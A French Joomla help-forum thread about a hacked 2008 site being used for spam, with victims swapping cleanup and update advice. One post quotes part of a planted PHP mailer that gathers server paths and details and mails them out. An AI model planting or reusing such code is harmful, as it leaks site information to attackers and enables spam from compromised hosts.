mon site a été hacké !!!

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • mon site a été hacké !!!

    bonjour à tous.
    Ce matin en allant sur mon site j'ai eue la désagréable surprise de voir à la place de ma page d'accueil un joli message de hacker ~ || MoHaMeDiTo Was Here ||~ Hacker , Spammer || ~. De plus il m'était impossible de me connecter en admin car mon mot de pass avait été modifier lui aussi.

    Mon site à ce moment là tournait sous la version 1.5.3 de joomla . Honte à moi, je n'avais qu'à faire la mise à jour.
    En lisant les divers posts j'ai réussi à reprendre le contrôle de mon admin et en cherchant dans mon ftp, j'ai trouver le fichier qui avait été modifier et qui empêchait l'affichage de mon site.

    J'ai donc remis tout en ordre avec les sauvegardes en ma possession. Je suis aller modifier mes mots de passes et voilà que je reçois dans la matinée un mail de mon hébergeur ovh m'annonçant que des plaintes avaient étés déposer contre moi pour envois de mails non sollicités.

    En fait le hacker était en train de faire du spam via mon site.

    Maintenant je me pose les questions suivantes:

    - pensez vous que le hacker soit passer par joomla pour envoyer du spam?
    - suis-je protéger du hacker depuis que j'ai installer la version 1.5.6 de joomla?
    -comment savoir si le hacker à pirater mon compte ovh?

    j'ai lue les posts concernant les problèmes du même types rencontrer par d'autres utilisateurs, mais je n'ai pas vu de cas d'envois de spam.
    N’étant pas une pro j’ai besoins de conseils de personnes qui connaissent ce genre de situations.

    Mon site http://www.meltingpopote.fr utilise les composants gary's cookbook, joomlapack, xmap et les modules banners slider, le google analytics et le template siteground-j15-51. voilou pour la présentation.

    Merci d’avance .

    Rachounette
    Dernière édition par rachounette à 02/09/2008, 11h13
    www.meltingpopote.fr
    www.lalumieredesfees.fr

  • #2
    oui

    Bonsoir
    J'ai eu la même aventure que toi et le hacker avait mis un fichier dans mon dossier de stats qui servait à envoyer des spams.
    Le fichier s'appelait boc.oooo !
    Ce n'est pas parce que tu as réparé ton site que celui ci est sain et si tu n'a pas trouvé le fichier spammeur....
    Si tu as une sauvegarde d'avant ton attaque, supprime et restaure ton site avec cette sauvegarde et fait la mise à jour dans la foulée.
    Mon hébergeur m'a dit que la mise à jour de Joomla n'était qu'une rustine qui peut-être encore détournée ?
    La mise à jour est obligatoire en attendant mieux.

    Commentaire


    • #3
      Merci pour cette info, je regarde de suite .
      J'ai conscience que de toute façon je vais peut être obliger de tout refaire. Enfin avec un bébé à éléver je vais peut être laisser tomber (faute de temps)!!! en tout cas bravo monsieur le hacker d'avoir pourri mon site
      Un grand merci à toi franblues,je te souhaite un bon week-end et une joyeuse vie sur le web.
      Dernière édition par rachounette à 29/08/2008, 21h48
      www.meltingpopote.fr
      www.lalumieredesfees.fr

      Commentaire


      • #4
        Les attaques ne sont pas toujours la faute des CMS.

        Envoyé par Franblues Voir le message
        Bonsoir
        J'ai eu la même aventure que toi et le hacker avait mis un fichier dans mon dossier de stats qui servait à envoyer des spams.
        Le fichier s'appelait boc.oooo !
        Ce n'est pas parce que tu as réparé ton site que celui ci est sain et si tu n'a pas trouvé le fichier spammeur....
        Si tu as une sauvegarde d'avant ton attaque, supprime et restaure ton site avec cette sauvegarde et fait la mise à jour dans la foulée.
        Mon hébergeur m'a dit que la mise à jour de Joomla n'était qu'une rustine qui peut-être encore détournée ?
        La mise à jour est obligatoire en attendant mieux.
        Bonjour,

        Les hébergeurs mauvais disent beaucoup de chose en ce moment.
        Surtout que pour changer des fichiers qui se trouve dans le dossier de stats de ton hébergement, et la je rigole fort, cela n'a rien à voir avec joomla.
        La faille de sécurité est belle et bien de la faute de ton hébergeur.

        Donc ne croyez pas toujours ce que dise les hébergeurs, et essayer de savoir s'ils ne vous prennent pas pour des blaireaux.
        Cordialement,
        Theking83
        Webmaster
        www.ltdw.net
        Pas de support par MP je réponds aux questions exclusivement posées sur le forum.

        Commentaire


        • #5
          Envoyé par theking83 Voir le message
          Bonjour,

          Les hébergeurs mauvais disent beaucoup de chose en ce moment.
          Surtout que pour changer des fichiers qui se trouve dans le dossier de stats de ton hébergement, et la je rigole fort, cela n'a rien à voir avec joomla.
          La faille de sécurité est belle et bien de la faute de ton hébergeur.

          Donc ne croyez pas toujours ce que dise les hébergeurs, et essayer de savoir s'ils ne vous prennent pas pour des blaireaux.
          je vois ça sous un autre angle theking83 !!!

          Je pense que Franblues veut dire qu'un fichier a été planté sur son site (boc.oooo dans son dossier de stats) et vu que son site était faillible c'est fort probable puisque une fois dans l'administration nous avons toutes les coordonnées du ftp, quand à la rustine faite pour stopper le reset c'est tout aussi probable aussi qu'elle ne soit pas totalement efficace.au moins on peut pas accuser son hébergeur de manquer d'argument !!! ils vont en profiter pour mettre le paquet sur le dos de JoJO!

          c'est dingue il existe encore beaucoup de site en 1.50 qui voguent , j'en ai trouvé tout un tas cettte apremidi , j'ai même pondu une requete spéciale pour les trouver et google c'est vraiment bien d'un côté et de l'autre c'est la poisse !!!
          adaptations|conceptions

          Commentaire


          • #6
            Bonjour,

            Oui bon c'est vrais que cela reste possible par le ftp qu'on récupère (et encore certain hébergeur refuse l'écriture dans ce genre de répertoire quand l'ordre d'écriture ne provient pas du script de stats), bon soit.
            Mais j'ai dis cela par expérience personnel, car avant de savoir, on ne sais rien et la franchement on prend la personne vraiment pour un blaireau.

            Je ne citerais pas ici tous ce que l'on a voulus me faire avaler à mes débuts

            Moralité : Ne croyez pas aveuglement ce que l'on vous dis, renseigner vous, suivez les mises à jour et pour finir tenez vous informez sur la sécurité.

            Allez je vous la raconte cette petite anecdote :
            Je viens de prendre un hébergement tous neuf, rien n'est installer, je crée juste un mail de test (turlute@domaine.tld) que je teste même pas, que je donne à personne et qui est diffuser nul part.
            Et rien d'autre.
            J'attends 1 semaine, et je vais dans le webmail de l'hébergeur et la
            Pas moins de 50 spam. J'en parle au responsable technique de l'hébergeur, sa réponse fut "Cela viens du faite que votre script Webmail n'est pas sécurisé" sans commentaire.
            Cordialement,
            Theking83
            Webmaster
            www.ltdw.net
            Pas de support par MP je réponds aux questions exclusivement posées sur le forum.

            Commentaire


            • #7
              le fichier

              Le fichier ( en .php et non .ooo, sorry !) : trouvé dans le dossier webstats ( webalizer ), voici une partie du code ( pas envie de publier ce genre de fichier ! )
              Code:
              
              $ra44  = rand(1,99999);
              $subj98 = "Emank-Enak";
              $email = "";
              $from="From: GRATIS <support@human-rights.org>";
              $a5 = $_SERVER['HTTP_REFERER'];
              $b33 = $_SERVER['DOCUMENT_ROOT'];
              $c87 = $_SERVER['REMOTE_ADDR'];
              $d23 = $_SERVER['SCRIPT_FILENAME'];
              $e09 = $_SERVER['SERVER_ADDR'];
              $f23 = $_SERVER['SERVER_SOFTWARE'];
              $g32 = $_SERVER['PATH_TRANSLATED'];
              $h65 = $_SERVER['PHP_SELF'];
              $msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
              mail($email, $subj98, $msg8873, $from);
              
              }
              
              
              
              ?>
              <p class="style1">PHP Mailer<br>
                &copy "noble" 2008, Feb.<br>
                    </p>
              <?php
              if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";}
              ?>
              
              </body>
              
              </html>
              Le fait est que j'avais une page d'accueil avec des indications linux/apache ou l'on voyait toute l'arborescence de mon site, y compris les dossiers autres que ceux de joomla !

              Bonne journée

              Commentaire


              • #8
                Envoyé par Franblues Voir le message
                Le fait est que j'avais une page d'accueil avec des indications linux/apache ou l'on voyait toute l'arborescence de mon site, y compris les dossiers autres que ceux de joomla !

                Bonne journée
                bonjour ,

                vu la partie du code que tu as montré , c'est pas étonnant

                $msg8873 contient tout ce qu'il faut !!!

                si tu veux vérifier l'intégrité de tes fichiers mets en place le script indiqué dans cette mini faq tu auras les informations nécéssaires , date de modifications et nom des fichiers qui ont été modifiés.

                @+
                adaptations|conceptions

                Commentaire


                • #9
                  bonsoir @ tous.
                  Après moultes recherche j'ai trouver dans mon ftp 2 fichier et 1 cheval de troie que le hacker avait déposer dans mon site.

                  J'ai fais une sauvegarde de mon site avec joomlapack et en voulant la télécharger sur mon pc mon antivirus m'a signaler un cheval de troie. J'ai pris le nom du fichier et suis aller à sa recherche et avec lui, j'ai trouver 2 autres copains. En faite, ce cas à déja été évoquer dans une autre discution et comme moi les 2 fichiers étaient stocker dans la racine du site et le cheval de troie dans le dossier image de l'admin.
                  La subtilité est les fichiers étaient nommés en jomla.php et non en joomla.php ce que je n'avais pas vu.

                  Normalement suite à la purge des mails en attente que j'ai effectuer ce matin j'aurrais due retrouver un service normal, mais des plaintes m'ont étés de nouveau envoyées. C'est ce qui m'a permis de savoir que le problème persistait.

                  Donc je vais refaire cette procédure demain, (car je dois attendre 24 heures) et je saurais si tout ce que j'aie erradiquer aurra permis de régler le problème.

                  pffffffouuuuuu, j'espère que je suis clair parceque c'est un peu pas évident à raconter tout ça.

                  Bonne soirée @ tous.

                  Rachounette.
                  Dernière édition par rachounette à 01/10/2008, 09h59
                  www.meltingpopote.fr
                  www.lalumieredesfees.fr

                  Commentaire


                  • #10
                    Bonjour,

                    [mode hors sujet]
                    rachounette quel fichier langue tu utilise pour gary's cookbook ?
                    Et je ne sais pas si tu le sais mais il est sortis une version 3.0.4 de ce formidable composant de gestion de recette.
                    [fin hors sujet]

                    Bravos pour ta détermination, c'est comme cela que l'on doit faire.
                    Ne pas baisser les bras, chercher, trouver et éradiquer.
                    Cordialement,
                    Theking83
                    Webmaster
                    www.ltdw.net
                    Pas de support par MP je réponds aux questions exclusivement posées sur le forum.

                    Commentaire


                    • #11
                      Envoyé par Thorhax Voir le message
                      bonjour ,

                      vu la partie du code que tu as montré , c'est pas étonnant

                      $msg8873 contient tout ce qu'il faut !!!

                      si tu veux vérifier l'intégrité de tes fichiers mets en place le script indiqué dans cette mini faq tu auras les informations nécéssaires , date de modifications et nom des fichiers qui ont été modifiés.

                      @+
                      Bonjour
                      Par prudence, j'ai vidé le ftp et la base de donnée et je suis reparti sur une sauvegarde plus ancienne que j'ai mis à jour vers joomla 1.56 : ça fait du boulot pour refaire les articles manquants mais c'est plus sûr !
                      Bonne journée
                      François

                      Commentaire


                      • #12
                        Envoyé par theking83 Voir le message
                        Bonjour,

                        [mode hors sujet]
                        rachounette quel fichier langue tu utilise pour gary's cookbook ?
                        Et je ne sais pas si tu le sais mais il est sortis une version 3.0.4 de ce formidable composant de gestion de recette.
                        [fin hors sujet]

                        Bravos pour ta détermination, c'est comme cela que l'on doit faire.
                        Ne pas baisser les bras, chercher, trouver et éradiquer.
                        bonjour theking83,

                        [mode hors sujet]
                        J'utilise le version 3.0.3 de GCB et en ce qui concerne le fichier langue, je sais que c'est le fichier en français mais je ne suis pas capable de t'en dire plus car ce n'est pas moi qui en ai fais l'instal.

                        Je ne savais pas qu'il y avait une version plus récente, mais comme je dois tout réinstaller je vais en profiter pour mettre la 3.0.4.
                        Connaitrais-tu le fichier langue pour cette version?

                        En tout cas merci pour l'info
                        [fin hors sujet]
                        www.meltingpopote.fr
                        www.lalumieredesfees.fr

                        Commentaire


                        • #13
                          Salut à tous .

                          finalement il semblerait que mes petites manips ont réglées mes problème. De toutes façon si ça ne marche pas je ré-instal le tout.

                          La leçon que j'en retire est qu'il faut faire ses mises à jour régulièrement ainsi que ses sauvegarde et que quoi qu'il arrive le risque 0 n'existe pas.

                          Merci en tout cas de votre attention et de vos conseils .

                          Je vous souhaite une agréable journée .

                          rachounette.
                          www.meltingpopote.fr
                          www.lalumieredesfees.fr

                          Commentaire


                          • #14
                            Envoyé par Thorhax Voir le message
                            je vois ça sous un autre angle theking83 !!!

                            Je pense que Franblues veut dire qu'un fichier a été planté sur son site (boc.oooo dans son dossier de stats) et vu que son site était faillible c'est fort probable puisque une fois dans l'administration nous avons toutes les coordonnées du ftp, quand à la rustine faite pour stopper le reset c'est tout aussi probable aussi qu'elle ne soit pas totalement efficace.au moins on peut pas accuser son hébergeur de manquer d'argument !!! ils vont en profiter pour mettre le paquet sur le dos de JoJO!

                            c'est dingue il existe encore beaucoup de site en 1.50 qui voguent , j'en ai trouvé tout un tas cettte apremidi , j'ai même pondu une requete spéciale pour les trouver et google c'est vraiment bien d'un côté et de l'autre c'est la poisse !!!
                            J'ai aussi été hacké ce matin mais je ne comprends pas pourquoi tu dis que "une fois dans l'administration nous avons toutes les coordonnées du ftp" ?
                            En fait dans mon site je n'ai pas activé le ftp (et je ne suis pas prêt de le faire). Le hacker a modifié le log/pass de l'administrateur et changé la page d'accueil en éditant et remplaçant le template (donc le fichier index.php du template). Mais à priori rien d'autre !

                            A part cela j'aimerais savoir comment on peut accéder autrement au Ftp, d'autant que cela voudrais dire que je vais avoir d'autres soucis, ce qui n'est pas le cas pour le moment.

                            Je suis assez d'accord avec theking83, les hébergeurs ont vite fait de renvoyer la faute à l'utilisateur.

                            Commentaire


                            • #15
                              Salut

                              Il semble qu'il faille installer la version 1.5.6 pour plus de sécurité.

                              Bon courage

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X